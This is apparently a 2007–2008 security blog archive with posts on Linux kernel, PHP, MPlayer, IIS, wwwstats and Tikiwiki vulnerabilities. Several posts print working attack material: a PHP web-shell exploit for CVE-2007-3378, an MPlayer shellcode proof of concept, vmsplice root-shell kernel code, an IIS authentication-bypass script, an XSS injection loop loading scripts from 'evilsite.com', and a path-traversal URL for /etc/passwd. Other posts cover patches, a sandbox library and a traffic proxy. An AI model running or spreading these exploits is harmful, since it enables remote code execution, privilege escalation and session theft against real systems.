If we patch the call dword ptr DS:[7145C] (connect) to make our fake connection to the evilserver, it will not work because of the certificates validations. But cards can be sended to the evil-host. The trojanized client can be distributed to the users.

Conclusion: The software always must be downloaded from an official font by a clear url.

my PNL Bot

2008-04-09T16:59:00.003+02:00

I am coding a msn messenger bot based in Milton Ericsson's MetaModel.
The bot is at the address: metamodelo@live.com

The MetaModel tries to open your mind, by questinoning your Beliefs.

Beliefs are filters of the reality, everybody see the reality through them, but can be changed. Are like a glasses, you can see the things from other glasses.

There are three kind of filters, distortion, generalization and suppression.
If you say one thing to help other, you wouldn't help him, you have to ask to detail the Belief.
When we try to answer, we fill our map with new chances.

If we let ourselves to test other Beliefs to see what happens, we will open our mind.

Plan9 Security

2008-04-09T12:57:00.027+02:00

Plan9 is a new concept of operative system, I like it but I am not confident about its security.

- It saves all the passwords used to connect to remote services in the cache

- There are grids open, maybe are vulnerable a some kind of worms, or can be use as DDoS platforms.

- When you introduce the password to log-in to remote file-server, is viewed in plaint-ext at the screen.

- plan9 services are vulnerable to a stack attacks.

plan9 Security
plan9 Shellcode
plan9 scheduler
pegassus, plan9 webserver
acid, plan9 debugger

I have recorded a video introducing the acid debugger usage.

SSH ForceCommand security flaw

2008-04-07T07:57:00.004+02:00

ForceCommand is a sshd_config option that lets use the remote ssh to execute a restricted commands, for example vi somefile.

When a SSH session is started the ~/.ssh/rc shell script is executed, the user logged by ssh, has permissions to write into his own rc.

Then if we are allowed to make a vi somefile, we can write into ~/.ssh/rc and write a /bin/bash that will be spawned the next time we enter to the system.

The patch only lets the rc execution when ForceCommand is not enabled (options.adm_forced_command == NULL)


+++ usr.bin/ssh/session.c 27 Mar 2008 10:54:55 -0000
@@ -878,8 +878,9 @@
  do_xauth =
      s->display != NULL && s->auth_proto != NULL && s->auth_data != NULL;
 
- /* ignore _PATH_SSH_USER_RC for subsystems */
- if (!s->is_subsystem && (stat(_PATH_SSH_USER_RC, &st) >= 0)) {
+ /* ignore _PATH_SSH_USER_RC for subsystems and admin forced commands */
+ if (!s->is_subsystem && options.adm_forced_command == NULL &&
+     (stat(_PATH_SSH_USER_RC, &st) >= 0)) {
   snprintf(cmd, sizeof cmd, "%s -c '%s %s'",
       shell, _PATH_BSHELL, _PATH_SSH_USER_RC);
   if (debug_flag)

cygwin security

2008-03-19T11:50:00.006+01:00

On November 2007 I have reported to cygwin developers a very important security flaw at cygwin subsistem, that can be exploited remotelly via SSH, HTTP, or almost any kind of daemon runing under cygwin.

jolmos cygwin Advisory

vade79/v9 has released a nice exploit for webdespoxy software, with cygwin the explotation is more efective because all cygwin processes have linked the cygwin1.dll kernel, then we have some universal offsets like:

0x61048690 push esp - ret
0x6104936D jmp esp
0x6112C494 push esp - ret

I don't recomend to use cygwin to opening services to the net.

Opera Blogs antiautomatization system

2008-02-28T17:54:00.009+01:00

Today I have reported to opera.com that they are using a weak/useless anti-automatization-system, well we can make a simple bot that creates hundreds of blogs :)

Look their anti-automatization "captcha":

http://my.opera.com/community/signup/

well, text security code so easy to collect.
More info at:
http://www.captcha.net/

cya.

How to make a sandbox

2008-02-27T13:57:00.004+01:00

A real sandbox should be a loadable kernel module, but we can easilly make one at user space by coding a lib in order to be preloaded after every execution.

gcc -fPIC sandwich.c -o sandwich.so -shared
export LD_PRELOAD=`pwd`/sandwich.so

now connect() and sento() are hooked, then we can exec our "unsafe" programs,
if they try to connect will be intercepted.

Well, this can be bypassed by calling directly the syscall or using not implemented functions.


// $ gcc -fPIC sandwich.c -o sandwich.so -shared
#define RTLD_NEXT ((void *) -1l)
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <dlfcn.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <string.h>
#include <strings.h>
#include <netdb.h>
#include <netinet/ip.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <errno.h>
#include <fcntl.h>
//Real Calls
static int (*realConnect)(int sockfd, 
             const struct sockaddr *serv_addr, 
             socklen_t addrlen);
ssize_t  (*realSendto)(int  s,  
                       const  void  *msg,  
                       size_t  len,  
                       int flags, 
                       const struct sockaddr *to,
                       socklen_t tolen);
//Hooked Calls
int connect(int sockfd, 
            const struct sockaddr *serv_addr, 
            socklen_t addrlen);
ssize_t  sendto(int  s,  
                const  void  *msg,  
                size_t  len,  
                int flags, 
                const struct sockaddr *to,
                socklen_t tolen);

int connect(int sockfd, 
            const struct sockaddr *serv_addr, 
            socklen_t addrlen) {
        int opt;
        struct sockaddr_in *s = (struct sockaddr_in *)serv_addr;

        printf("Can I connect to %s:%d (Y/N)?",
               inet_ntoa(s->sin_addr),s->sin_port);
        opt = getchar();
        if (opt=='S' || opt=='s' || opt=='y' || opt=='Y') {
                realConnect = dlsym(RTLD_NEXT, "connect");
                return realConnect(sockfd,serv_addr,addrlen);

        } else {
                printf("Cancelled ;)\n");
                return -1;
        }
}

ssize_t  sendto(int  s,  
                const  void  *msg,  
                size_t  len,  
                int flags, 
                const struct sockaddr *to,
                socklen_t tolen) {
        int opt;
        struct sockaddr_in *ss = (struct sockaddr_in *)to;

        printf("Can I connect to %s:%d (Y/N)?",inet_ntoa(ss->sin_addr),ss->sin_port);
        opt = getchar();
        if (opt=='S' || opt=='s' || opt=='y' || opt=='Y') {
                realSendto = dlsym(RTLD_NEXT, "sendto");
                return realSendto(s,msg,len,flags,to,tolen);

        } else {
                printf("Cancelled ;)\n");
                return -1;
        }
}

PHP SafeMode bypass (CVE-2007-3378)

2008-02-26T23:32:00.007+01:00

Every week a new way to bypass php-safemode is released, it seemed funny, but this open_basedir Bypass is Scandalous.

If you try to exec some restricted call, safemode will stop-it.
Other way is to use php_value directive of .htaccess files (if httpd.conf is configured to allow httaccess)

So, you can break the safemode restrictions by adding php_value orders like that:

php_value include_path "some"
php_flag display_errors On
php_value upload_max_filesize 200M

for example:

echo php_value session.save_path /inne > .htaccess
session_start();

Exploit code:


# SecurityReason
# Coded by Maksymilian Arciemowicz
# (C) Copyright SecurityReason
# Affected Software : PHP 5.2.3 and prior
# Usage :
# ?cxib=dhr - Delete Delete .htaccess and result.txt
# ?sh=[our_command] - Execute the command
#
#variables
$htaccess="./.htaccess";
#variables
if(@mail("", "", "")==FALSE){
die("mail() function isn't active.");
}
if(!is_writable("./")){
die("This directory isn't writable.");
}
if($_GET['cxib']=="dhr"){
@unlink("./.htaccess");
@unlink("./result.txt");
}
$usun="";
if(file_exists("./result.txt") AND
file_exists("./.htaccess")){
$usun .= "<p><a
href=\"http://".$_SERVER["HTTP_HOST"]. 
$_SERVER["SCRIPT_NAME"]."?cxib=dhr\">Delet
e .htaccess and result.txt</a>";
}
$htmlstart="<HTML>
<HEAD>
<TITLE>SecurityReason Exploit - PHP 5.2.3 and
prior</TITLE>
</HEAD>
<BODY>";
$formtxt="<center><h1>Security<b><font
color=RED>R</font>eason</b></h1><p>Exp
loit for PHP 5.2.3 and
prior</p><B><CENTER><FONT
COLOR=\"RED\">C</FONT>oded by
<b>Maksymilian Arciemowicz</b>
".$usun."
<p>Form:<br>
<form
action=\"http://".$_SERVER["HTTP_HOST"].$_SER
VER["SCRIPT_NAME"]."\"
name=\"Form\" method=\"POST\">
sh# <input type=\"text\" name=\"sh\"
size=\"50\" value=\"\">
<input type=\"submit\" name=\"sent\"
value=\"Exec\">
</form>
</CENTER></B>";
$htmlend="</BODY>
</HTML>";
$path=dirname($_SERVER["SCRIPT_NAME"]);
if(empty($sh)){
if(empty($_GET['sh'])){
if(empty($_POST['sh'])){
echo $htmlstart.$formtxt;
if(file_exists("./result.txt")){
echo "<center><iframe
src=\"http://".$_SERVER["HTTP_HOST"].
$path."/result.txt\" height=300
width=1000></center>";
}
echo $htmlend;
exit();
} else {
$sh=$_POST['sh'];
}
} else {
$sh=$_GET['sh'];
}
}
if (!$handle = @fopen($htaccess, 'w')) {
echo "Cannot create
".$htaccess."<B>check your rights to this
directory.<P>. exit();";
exit;
}
$syntax="php_value mail.force_extra_parameters '-t
&& ".$sh." >
".dirname(__FILE__)."/result.txt'";
if (fwrite($handle, $syntax) === FALSE) {
echo "Cannot write to file
(".$htaccess.")";
exit;
}
if(!empty($_POST['sent'])){
@mail("", "", "Yeah");
sleep(2);
header("Location:
http://".$_SERVER["HTTP_HOST"].
$_SERVER["REQUEST_URI"]."?cxib=".date('s'));
exit();
}
?>

have fun.

Google Adsense is not a serious option

2008-02-22T12:54:00.003+01:00

If you are thinking to put a GoogleAdsense, you must know some thinks about them:

If somebody attack your adsenses:
1. Google will close your account
2. Google will take money from your bank account!! They say "We will get the money you have earned"

Well, I suggest avoid google adsense.

MPlayer Security

2008-02-13T12:25:00.012+01:00

MPlayer started 2008 the wrong way, 3 dangerous security flaws has been reported.

* CVE-2008-0486 Stack overflow line 229 demux_audio.c
Attack Vector: .mov file header


  ptr += 4;
  comment = ptr;
+ if (&comment[length] < comments || 
      &comment[length] >= &comments[blk_len])
+     return;
  c = comment[length];
  comment[length] = 0;

* CVE-2008-0629 Overflow stream/g
Attack Vector: Album title


 strncpy(album_title, ptr, len);
 album_title[len-2]='\0';

The -2 is wrong.

* CVE-2008-0630 Overflow url.c
Attack Vector: Long url will avoid the final \0

The most dangerous scenario is to publish a mp3 with a crafted album name, who listen this mp3 by cddp:// will be infected or reverse-shelled, then with the vmsplice exploit remote root will be

Recommendation: Always the same always, keep your software uptdated and audited!

I'm doing the POC:


#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

char sha0code[] =
        "\xeb\x16\x5b\x31\xc0"
        "\x50\x53\xb0\x0b\x89"
        "\xdb\x89\xe1\x31\xd2"
        "\xcd\x80\x31\xc0\x40"
        "\x31\xdb\xcd\x80\xe8"
        "\xe5\xff\xff\xff\x2f"
        "\x62\x69\x6e\x2f\x73\x68";

int checkIdent(char *ptr) {
        if (ptr[0] == 'T'  &&
            ptr[1] == 'A'  &&
            ptr[2] == 'G')
                return -1;
        else
                return 0;
}

int main (int argc, char **argv) {
        char *mp3file;
        int fd;
        int bytes;
        int i;
        unsigned long map;
        char *tag;
        char *album;

        if (argc != 2) {
                printf("USAGE: %s FileToInjectTheExploit.mp3\n",argv[0]);
                return 0;
        }

        //map mp3 to memory
        fd = open(argv[1],O_RDWR);
        bytes = lseek(fd,0,SEEK_END);
        mp3file = (char *)malloc(bytes);
      lseek(fd,0,SEEK_SET);
        bytes = read(fd,mp3file,bytes);

        //look for mp3 tag structure
        for (i=bytes; i>100; i--) {
                if (checkIdent(i+mp3file)) {
                        album = mp3file+i+3+30+30;
                        break;
                }
        }

        //inject the evil string
        printf("Album:%s\n",album);
        memset(album,0x41,90);

        //write changes
        lseek(fd,0,SEEK_SET);
        write(fd,mp3file,bytes);
        close(fd);
        free(mp3file);
}

MS08-004 CVE-2008-0084 Windows Vista remote reboot

2008-02-13T11:36:00.007+01:00

If the attacker assign the broadcast address to multiples hosts with DHCP requests, the Microsoft Windows Vista's duplicate ip detection algorithm will try to erase the route-table this broadcast, address and then the system is reboted.

Security Fix

Linux vmsplice Local Root Exploit

2008-02-10T21:11:00.002+01:00

Linux vmsplice syscall let a non-root user inject and execute code to the kernel.

Vulnerable kernels: Linux 2.6.17 - 2.6.24.1

It works ok in my Debian 2.6.18-4-486

The goal is inject this code to the kernel.
This loop, check the task_struct, if a process with the current uid and gid is found, then is setted to zero.

void    kernel_code()
{
 int i;
 uint *p = get_current();

 for (i = 0; i < 1024-13; i++) {
  if (p[0] == uid && p[1] == uid &&
      p[2] == uid && p[3] == uid &&
      p[4] == gid && p[5] == gid &&
      p[6] == gid && p[7] == gid) {
   p[0] = p[1] = p[2] = p[3] = 0;
   p[4] = p[5] = p[6] = p[7] = 0;
   p = (uint *) ((char *)(p + 8) + sizeof(void *));
   p[0] = p[1] = p[2] = ~0;
   break;
  }
  p++;
 } 
 exit_kernel();
}

Then a root shell can be spawned:

void exit_code()
{
 if (getuid() != 0)
  die("wtf", 0);

 printf("[+] root\n");
 putenv("HISTFILE=/dev/null");
 execl("/bin/bash", "bash", "-i", NULL);
 die("/bin/bash", errno);
}

kernel_code() is mapped and spliced to a pipe with _vmsplice(pi[1], &iov, 1, 0);
exit_code() is assigned to the SIGPIPE signal.

The Exploit Code.

The problem is at: /fs/splice.c copy_from_user_mmap_sem()

They have solved the problem by adding two access_ok() calls to check the permissions of the page(s) to copy.

The get_iovec_page_array() function, also need this access_ok() check, This monday this patch has been committed.

Multi Protocol Proxy

2008-02-08T17:00:00.002+01:00

I have improved the visibility of my multi-protocol proxy.

This soft is useful if you want to analyze a protocol, or a daemon. Plug this stuff at the middle, point it to the daemon, and point the client to the proxy.

~ > sha0proxy.pl
/bin/sha0proxy.pl
modes: view trap

At view mode, you can view the comunication.
At trap mode you can interact with the communication.

download sha0proxy

-------- sha0proxy.pl ----------


#Proxy MultiProtocolo
#sha0proxy.pl  v0.5 coded by sha0[@]badchecksum[.]net
#Private No distribuir!!
#TODO: capturar SIGINT
#      ncurses para modificar los bytes directamente
#      udp
#      formato shellcode
#      logear



#You have to install vncviewer, and the following perl modules:
#perl -MCPAN -e shell
#cpan>install threads
#...
#cpan>install IO::Socket
#...
#cpan>install IO::Select
#...

use IO::Socket;
use IO::Select;
#use Net::UDP;
my %color=(
        red=>"\x1b[31;01m",
        green=>"\x1b[32;02m",
        yellow=>"\x1b[33;01m",
        blue=>"\x1b[34;01m",
        magenta=>"\x1b[35;01m",
        cyan=>"\x1b[36;01m",
        white=>"\x1b[37;00m"
);

die "$0    \nmodes: view trap\n" if (@ARGV!=4);
die "Valid modes are:  view & trap\n" if ($ARGV[3] ne 'view' && $ARGV[3] ne 'trap');

#my $lport=(int(rand(500))+10000);
my $lport=$ARGV[0];
my $rport=$ARGV[2];
my $rhost=$ARGV[1];
my $buff;
my $vulnerable=0;
my $mode=$ARGV[3];

my $out;
my $in=IO::Socket::INET->new (
        LocalAddr=>'0.0.0.0',
        LocalPort=>$lport,
        Proto=>'tcp',
        Listen=>1,
        Reuse=>100
) or die "cannot open port $!\n";

print "listening $lport port\n";


#print  "\x1b[?25l"; #no cursor

while (my $welcome=$in->accept()) {
        $out=IO::Socket::INET->new (
                PeerAddr=>$rhost,
                PeerPort=>$rport,
                Timeout=>20
        ) or die "cannot connect $!\n";

        print "connected to $rhost:$rport\n";
       if (!fork()) {
                $out->blocking(1);
                $welcome->blocking(1);
                $out->autoflush(1);
                $welcome->autoflush(1);

                $s=IO::Select->new($out, $welcome);
        proxy:
                while(1) {
                        my @ready = $s->can_read;
                        foreach my $ready (@ready) {
                                if($ready == $welcome) {
                                        my $data;
                                        $welcome->recv($data, 8192);
                                        last proxy if (! length($data));
                                        last proxy if(!$out || !$out->connected);
                                        &muestra($data,1);
                                        if ($mode ne 'view') {
                                                print "=>>";
                                                $cmd=;
                                                chomp($cmd);
                                                $data=sprintf(eval("\"$cmd\"")) if (length($cmd));
                                        }
                                        eval { $out->send($data); };
                                        last proxy if $@;
                                } elsif ($ready == $out) {
                                        my $data;
                                        $out->recv($data, 8192);
                                        last proxy if(!length($data));
                                        last proxy if(!$welcome || !$welcome->connected);
                                        &muestra($data,0);
                                        if ($mode ne 'view') {
                                                print "=<<";
                                                $cmd=;
                                                chomp($cmd);
                                                $data=sprintf(eval("\"$cmd\"")) if (length($cmd));
                                        }
                                        eval { $welcome->send($data); };
                                        last proxy if $@;
                                }
                        }#foreach

                        if (!$welcome || !$out) {
                                close $out;
                                close $welcome;
                                return;
                        }
                }#while 1
        } #fork

}
sub muestra {
        my $data = $_[0];
        my @bytes = split(//,$data);
        my $b;
        my $alserver = $_[1];
        my $count=0;
        my $str="";
        my $lin=1;
        print $color{white};
        print ">"x33 if ($alserver);
        print "<"x33 if (!$alserver);
        print "\n   |00 01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20|";
        print "\n---+--------------------------------------------------------------+---\n";

        print "000|";
        foreach $b (@bytes) {
                print $color{green}  if (($b ge 'a' && $b le 'z') ||($b ge 'A' && $b le 'Z') || $b eq "\x20");
                print $color{blue}   if ($b ge '0' && $b le '9');
                print $color{red}    if ($b eq "\x00");
                print $color{cyan}   if ($b eq "\x0a" || $b eq "\x0d");
                printf "%.2x ",ord($b);
                print $color{white};
$b = "." if ($b lt "\x20" || $b gt "\x7e");

                $count++;
                $str.=$b;
                if ($count==21) {

                        #$str=~s/[^a-z^A-Z^0-9^#^@^:^]/\./ig;

                        $count = 0;
                        printf "%s\n%.3d|",$str,$lin;
                        $lin++;
                        $str="";
                }
        }
        $str=~s/[^a-z^A-Z^0-9^#^@]/\./ig;
        for ($b=$count;$b<21;$b++){
                print "   ";
        }
        print $str."\n";
}

Xorg stack oveflow privilege scalation

2008-02-01T11:44:00.000+01:00

If the user sets more number of visuals than the number of visuals of all screens, then the swap bucle can be abused.

Xext/EVI.c
ProcEVIGetVisualInfo(ClientPtr client)

+ for (i = 0; i < screenInfo.numScreens; i++)
+ total_visuals += screenInfo.screens[i]->numVisuals;
+ if (stuff->n_visual > total_visuals)
+ return BadValue;

more info soon.

CVE-2008-0001 Privilege scalation exploit.

2008-01-24T01:03:00.000+01:00

CVE-2008-0001 Linux Kernel VFS Unauthorized File Access Vulnerability.

Trond changed namei.c code, and implemented a vulnerability on 18 Oct 2005
Bill Roman detected it and solve the problem in the following patch:


--- a/fs/namei.c
+++ b/fs/namei.c
@@ -1576,7 +1576,7 @@ int may_open(struct nameidata *nd, int acc_mode, int flag)
        if (S_ISLNK(inode->i_mode))
                return -ELOOP;
        
-       if (S_ISDIR(inode->i_mode) && (flag & FMODE_WRITE))
+       if (S_ISDIR(inode->i_mode) && (acc_mode & MAY_WRITE))
                return -EISDIR;
 
        error = vfs_permission(nd, acc_mode);
                        return -EACCES;
 
                flag &= ~O_TRUNC;
-       } else if (IS_RDONLY(inode) && (flag & FMODE_WRITE))
+       } else if (IS_RDONLY(inode) && (acc_mode & MAY_WRITE))
                return -EROFS;

Well, FMODE_WRITE=2 if we open with O_RDWR (=2) at don't writable file, we will get -EROFS
but we can use O_WRONLY (=1) and != FMODE_WRITE (=2) then we can map the descriptor to memory and write ;)

#drwxr-xr-x 2 root root 4096 2008-01-28 15:46 test
#su - shao

Without write permissions, shao has appended

open("/test", O_WRONLY) = -1 EISDIR (Is a directory)
open("/test", O_RDWR) = -1 EISDIR (Is a directory)
open("/test", O_RDONLY|O_APPEND) = 3

O_APPEND succeed and kernel give us 3rd descriptor.

If we write with write() syscall:

open("/tmp/test", O_RDONLY|O_APPEND) = 3
lseek(3, 0, SEEK_END) = 5
write(3, ptrace: umoven: Input/output error
0x41, 1) = -1 EBADF (Bad file descriptor)
close(3) = 0

write() syscalls return EBADF, he don't let us modify this kind of descriptor, he did a check.
mmap() syscall return -1

Well, from user space we can't exploit this.

hping3 double free security flaw.

2008-01-15T13:30:00.000+01:00

Today my friend Mario Diaz have discovered a interesting flaw in hping3, is a race condition + heap overflow dodgy of reproduce.

I love this kind of flaws, let's analyse the problem in order to make the exploit:

pcap_close sometimes cause a double free corruption:

pcap_next(0x8079f20, 0x8069c70, 130, 0, 0) = 0x807a12a
memcpy(0xb33e7970, "", 66) = 0xb33e7970
pcap_next(0x8079f20, 0x8069c70, 66, 0, 0) = 0x807a12a
memcpy(0xb33e7970, "", 66) = 0xb33e7970
pcap_next(0x8079f20, 0x8069c70, 66, 0, 0) = 0x807a12a
memcpy(0xb33e7970, "\252", 130) = 0xb33e7970
pcap_next(0x8079f20, 0x8069c70, 130, 0, 0) = 0x807a12a
--- SIGALRM (Alarm clock) ---
pcap_close(0x8079f20, 0, 0, 0x804eb0d, 0) = 505

When hping sends a packet, if you have specified the -c flag (number of packets) and all packets are sended, a sigalarm is called:

send.c:void send_packet (int signal_id) {
...
sent_pkt++;
Signal(SIGALRM, send_packet);

if (count != -1 && count == sent_pkt) { /* count reached? */
Signal(SIGALRM, print_statistics);
alarm(COUNTREACHED_TIMEOUT);

hping2.h:#define COUNTREACHED_TIMEOUT 1

One second later, a sigalarm is triggered, and print_statistics is called.

statistics.c:print_statistics(int signal_id) {

close_pcap();

I have reproduced the problem:


#include <pcap.h>
#include <stdio.h>

int main (void) {
        pcap_t *p;
        char *errbuf = (char *)malloc(3000);

        if (p = pcap_open_live(NULL,65535,1,3000,errbuf)) {
                pcap_close(p);
                pcap_close(p);
        } else {
                printf("open failed\n");
        }
}

# ./pcap
*** glibc detected *** double free or corruption (out): 0x0804adc0 ***
Abortado

# ldd -d pcap
linux-gate.so.1 => (0xffffe000)
libpcap.so.0.8 => /usr/lib/libpcap.so.0.8 (0xb7f94000)
libc.so.6 => /lib/tls/i686/cmov/libc.so.6 (0xb7e63000)
/lib/ld-linux.so.2 (0xb7fd5000)

When the race condition succeed, the pcap_close() is called twice, and then the double-free happens.

prctl problems have been solved

2008-01-09T15:07:00.000+01:00

In 2.6.22.* and prior we can do a prctl(PR_SET_DUMPABLE,2) then current->mm->dumpable value will be 2.

Let's see the bad check:

--- a/kernel/sys.c
+++ b/kernel/sys.c
@@ -1983,7 +1983,7 @@ asmlinkage long sys_prctl(int option, unsigned long arg2, unsigned long arg3,
error = current->mm->dumpable;
break;
case PR_SET_DUMPABLE:
- if (arg2 < 0 || arg2 > 2) {
+ if (arg2 < 0 || arg2 > 1) {
error = -EINVAL;
break;
}
current->mm->dumpable = arg2;
break;

A non-root user can make an exploit like this and set PR_SET_DUMPABLE to two:

.text
.global main
main:
mov $172, %eax
mov $2, %ebx
int $0x80

Is possible to make a SIGSEGV sgnal to this process and make a core in a directory that the user doesnt have permissions.

One way to get root is make a file in cron.d or fill a disk when only root are quota free, RoManSoFt and Dreyer used this trick in their exploit, see rs-labs.

I estimate that the linux kernel have more bad-checks like that.

mmap randomization bypass

2008-01-06T02:19:00.000+01:00

Todays, people patch their kernels with grsecurity and then is very difficult to exploit his process remotely.

One of grsecurity protection is mmap() randomization, now, every address allocation will be pseudo randomized.

Now, we don't know where the shellcode is, we will have to make some things to diverting the execution flow to our code.

Well we know the local shellcode at environ trick, but it will not usseful with the space layout randomization.

simkin, a friend of badchecksum team, have seen a way to make relative jumps instead of absolute ones.

If you overwrite only one byte of the saved eip, really you are overwriting the two lsb of the address, that means that you can point to relative code where you know what there are.

I say two lsb becouse the null byte of final string will be writed at the second byte when you write the first.

Then you can use pop pop ret or similar tricks to jump to the shellcode without knowing the address of it.

Well, in modern kernels we have stack and heap randomization but have some problems, linux-gate, the new sistem call method, is not randomized, we can use this library to find jumppoints.

jesus@pwn3d:/$ ldd -d /bin/ls
linux-gate.so.1 => (0xffffe000)
librt.so.1 => /lib/i686/cmov/librt.so.1 (0xb7f65000)
libacl.so.1 => /lib/libacl.so.1 (0xb7f5e000)
libselinux.so.1 => /lib/libselinux.so.1 (0xb7f47000)
libc.so.6 => /lib/i686/cmov/libc.so.6 (0xb7dfa000)
libpthread.so.0 => /lib/i686/cmov/libpthread.so.0 (0xb7de2000)
/lib/ld-linux.so.2 (0xb7f85000)
libattr.so.1 => /lib/libattr.so.1 (0xb7dde000)
libdl.so.2 => /lib/i686/cmov/libdl.so.2 (0xb7dda000)
libsepol.so.1 => /lib/libsepol.so.1 (0xb7d99000)
jesus@pwn3d:/$ ldd -d /bin/ls
linux-gate.so.1 => (0xffffe000)
librt.so.1 => /lib/i686/cmov/librt.so.1 (0xb7fbe000)
libacl.so.1 => /lib/libacl.so.1 (0xb7fb7000)
libselinux.so.1 => /lib/libselinux.so.1 (0xb7fa0000)
libc.so.6 => /lib/i686/cmov/libc.so.6 (0xb7e53000)
libpthread.so.0 => /lib/i686/cmov/libpthread.so.0 (0xb7e3b000)
/lib/ld-linux.so.2 (0xb7fde000)
libattr.so.1 => /lib/libattr.so.1 (0xb7e37000)
libdl.so.2 => /lib/i686/cmov/libdl.so.2 (0xb7e330

I know that there are other tecniques in the wild to bypass PAX protections.

Microsoft IIS ntlm and basic auth bypass

2007-12-30T12:01:00.002+01:00

You can protect your web contents by adding ntfs acls, then you will be secure.
But you can protect your web contents by the Internet Information basic/ntlm autentication, then this will be bypassed with null.htw object.

Both authentications seem be the same, but really the object null.htw let users get any file in web directory, only if it is protected by the filesystem, will be secure.

In the exploit you can see how to use the null.htw object.

#!/bin/sh
#
# NTLM && BASIC AUTH BYPASS :)
#
# sha0[at]badchecksum.net
# Based on my adv: http://www.securityfocus.com/bid/24105/info
# (CVE-2007-2815)

if [ $# != 2 ]
then
printf "USAGE:\t\t$0 \nExample:\t$0 http://www.microsoft.com /en/us/default.aspx\n\n";
exit 0
fi

site=$1
protectedObject=$2
evil=$site'/shao/null.htw?CiWebhitsfile='$protectedObject'&
CiRestriction=b&CiHiliteType=full'
lynx -dump $evil

Is hard to believe.

wwwstats vulnerable to Persistent XSS

2007-12-27T22:02:00.000+01:00

wwwstats is a very widely used Web traffic analyser, that registers in a database the user agents, referers, downloads, etc ..

I discovered a way to inject HTML and JavaScript to the database by calling directly the clickstats.php code. This would mean mass defacing, steal admin sessions, web redirecting, WSS Worms, google-bombing and google-priorizing.

To bypass the first 'if', is necessary to fill the HTTP Referer field with something, and inject the link to the database by the link get parameter.

An attacker can inject using the link parameter or the useragent field a script which will steal admin's cookies, or make a deface, or anything else...

If magic quotes are configured at php.ini, there is no problem, in javascript \'test\' is interpreted as 'test'.

Controlling the iterations number, is possible to do the injection in the ranking position you want:

while [ 1 ]; do
curl
'http://web.com/wwwstats/clickstats.php?link=<script>XXXX</scrip>' -e
'xxx'; done

Also is possible to attack by user agent: -A 'attack'

A payload can be:

<script scr='http://evilsite.com/XSSWorm.js'></script>

------------Exploit------------
#!/bin/sh
#jolmos (at) isecauditors (dot) com

if [ $# -ne 4 ]
then
echo "Usage: $0
<html or javascript to inject in downloads> "
echo "Example: $0 http://www.victym.com/wwwstats
<script>window.location="http://www.evilhost.com"</script> 100"
exit
fi

echo 'Attacking, wait a moment'
for i in `seq 1 $3`; do curl "$1/clickstats.php?link=$2" -e 'attack'; done

External links:
http://www.securityfocus.com/bid/26759
http://secunia.com/advisories/28002

Tikiwiki CMS Trasversal Directory

2007-12-27T10:14:00.000+01:00

Tikiwiki is a full featured CMS, massively used in the world.
(search on google: tiki-index.php)

18/12/2007 I was auditing the code and found a dangerous vulnerability, that lets a malicious user get any file in the system via web (with the apache user permissions)

Mose and the coders quickly solve the problem and release the 1.9.9 version.
Free software is more secure every day thanks to the quick response of the community.

Exploit explanation:

http://www.vulnsite.com/tiki-listmovies.php?
movie=../../../../../../etc/passwd%001234

Why this 1234 stuff?
well, the last 4 bytes of movie parameter, are erased, and then an .xml extension was appended.
Then tiki-listmovies will erase the "1234" and the null byte will ignore the extension.

Only is possible get the first 1000 bytes of the file.

The vulnerable code:

if(isset($_GET["movie"])) {
$movie = $_GET["movie"];
...

if ($movie) {
// Initialize movie size
$confFile = 'tikimovies/'.substr($movie,0,-4).".xml";

//trc('confFile', $confFile);
$fh = @fopen($confFile,'r');
$config = @fread($fh, 1000);
@fclose($fh);
if (isset($config) && $config <>'') {
$width =
preg_replace("/^.*?(.*?)<\/MovieWidth>.*$/ms", "$1", $config);
$height =
preg_replace("/^.*?(.*?)<\/MovieHeight>.*$/ms", "$1",
$config);
$smarty->assign('movieWidth',$width);
$smarty->assign('movieHeight',$height);
}
}

http://seclists.org/bugtraq/2007/Dec/0284.html
http://info.tikiwiki.org/tiki-read_article.php?articleId=19
http://www.securityfocus.com/bid/27008/info

Dangerous Bytes

2007-10-26T11:36:00.000+02:00

Some tty scape bytes can make damage remotelly.

You can inject this byte to daemon's log, to other's tty /dev/pts/*, by irc, etc ... and put colored logs :) or invisible logs, or executing command.

0x0e Change de view mode and, the victym have to reset the terminal
0x0f Restore the view mode (like reset command)
0x1b Scape byte:

0x1b, [c inject chars to cmd
0x1b, [r page up
0x1b, [u up

0x5f close the sequence

Example:
perl -e 'print "\x1b\x[c"' > /dev/pts/4

df linux comand is 2 bytes long that are in the hexa charset,
then i'm trying to inject the df conmmand remotelly.

Apache don't log this files, is not vulnerable, but there are other clients and servers vulnerables.

CVE-2007-4573 ptrace strikes again ;)

2007-09-24T23:15:00.000+02:00

The problem discovered by Wojciech Purczynski is:
A 64bit user can say putreg(TIF_IA32) to kernel
and the kernel will enter at the if and do:

value &= 0xffffffff;

ok, lets practice 1100 & 1111 = 1100 The value remain Ok

What happens if we are in 64bits, 0xffffffff is actually 0x00000000ffffffff
Well, the beginning of value will be erased :/

Let see the explotation details.

#define TIF_IA32 17 /* 32bit process */

We know the constant value, lets see the sched function:

static inline int test_tsk_thread_flag
(struct task_struct *tsk, int flag)
{
return test_ti_thread_flag(task_thread_info(tsk), flag);
}

static inline int test_ti_thread_flag
(struct thread_info *ti, int flag)
{
return test_bit(flag,&ti->flags);
}

quite obvious the bypass :)

Let's see the ptrace call:

When we invoke the PTRACE_SETREGS, we can see that putreg is invoked for each register.

We can do
putreg(child, <register>, <value>);

by calling
ptrace(PTRACE_SETREGS, <somepid>, NULL, <user_regs_struct>)

The key: We can have a 64bits process ptracing a 32bits one, then we can exploit this flaw.

We can erase the registers, is that a potentially priviledge scalation?

Finally: Don't let the user give us a data we know yet, because the user is a motherfucker.

Defeating packers

2007-08-23T02:13:00.001+02:00

I was reversing packed software, when I saw an easy way to defeat it: tracing if eip its outside a range.

When a packer extracts the code to a new maped layout, there is a moment when the execution flow is redirected to this code. We cannot put breakpoints becouse the memory is not maped, and cannot see the jump to the address becouse is like: call [eax+0CFh]

Is not possible to know wich value will take eax and wich value gets this indirect access to the memory.

But, there is a very easy way to stop the execution when the call is taken, with a eip range trace.

If you use olly, press ^T and enter the range of the current module.

In ancient times, spectrum-hackers cannot do this kind of things :)

In linux world, there are not ollydebug like debuggers :( but i think radare will be the future:

